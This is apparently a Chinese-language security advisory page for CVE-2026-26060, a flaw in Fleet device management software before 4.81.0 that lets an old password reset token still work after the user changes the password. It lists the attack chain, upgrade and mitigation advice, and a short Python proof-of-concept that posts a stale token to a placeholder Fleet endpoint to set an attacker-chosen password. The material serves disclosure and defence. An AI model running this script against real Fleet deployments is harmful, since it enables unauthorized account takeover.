CVE-2026-26060 CVSS 8.8 高危

CVE-2026-26060 Fleet密码重置令牌失效逻辑缺陷

披露日期: 2026-03-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-26060

漏洞类型

业务逻辑错误

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Fleet

漏洞概述

Fleet 是一款开源设备管理软件。在 4.81.0 版本之前，其密码管理逻辑存在严重缺陷，导致用户修改密码后，之前签发的密码重置令牌未被立即失效。攻击者可利用这一漏洞，重用过期的密码重置令牌来强制重置账户密码，从而在用户已经进行防御性密码更改的情况下，依然能够接管账户权限。官方已在 4.81.0 版本中修复了此问题。

技术细节

该漏洞的核心在于 Fleet 未能在用户密码变更时使旧的密码重置令牌失效，属于典型的业务逻辑缺陷。在安全的密码管理流程中，一旦密码被更改，所有先前的重置令牌应立即失效。然而，在受影响的 Fleet 版本中，系统仅验证令牌的格式和签名有效性，未校验令牌相对于当前密码哈希的时效性。攻击者利用场景如下：首先攻击者通过日志泄露、XSS或网络嗅探获取了受害者的密码重置令牌。随后，受害者察觉到账户异常，主动登录并修改了密码以进行防御。但由于漏洞存在，之前的重置令牌并未被系统清除。攻击者随后可使用该已过期的令牌向服务端发送重置密码请求，服务端错误地接受了该请求并允许设置新密码。这导致攻击者能够绕过受害者的防御措施，成功接管账户并获取最高权限。

攻击链分析

STEP 1

步骤1：令牌窃取

攻击者通过网络嗅探、日志访问或其他方式获取受害者的有效密码重置令牌。

STEP 2

步骤2：用户防御

受害者察觉到潜在风险或正常操作，主动登录系统并修改了账户密码。

STEP 3

步骤3：令牌重放

攻击者使用步骤1中获取的旧令牌，向服务器发送密码重置请求。

STEP 4

步骤4：账户接管

由于系统未验证令牌时效性，服务器接受请求并允许攻击者设置新密码，从而完全控制账户。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "https://fleet.example.com/api/v1/fleet/users/password/reset/confirm"

# The stale token obtained by the attacker before the victim changed the password
stale_reset_token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."

# New password to set for the account takeover
new_password = "AttackerControlledPass123!"

# Construct payload
payload = {
    "token": stale_reset_token,
    "new_password": new_password,
    "new_password_confirmation": new_password
}

try:
    # Send the password reset request using the old token
    # In vulnerable versions (< 4.81.0), this will succeed even if the password was changed
    response = requests.post(target_url, json=payload)

    if response.status_code == 200:
        print("[+] Success: Password reset using stale token.")
        print("[+] Account takeover completed.")
    else:
        print(f"[-] Failed: Status code {response.status_code}")
        print(response.text)
except Exception as e:
    print(f"[-] Error: {e}")

影响范围

Fleet < 4.81.0

防御指南

临时缓解措施

建议立即升级到最新版本。如果无法立即升级，应暂时禁用基于令牌的密码重置功能，转而采用手动管理员重置，并强制所有用户在修复后进行密码轮换。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表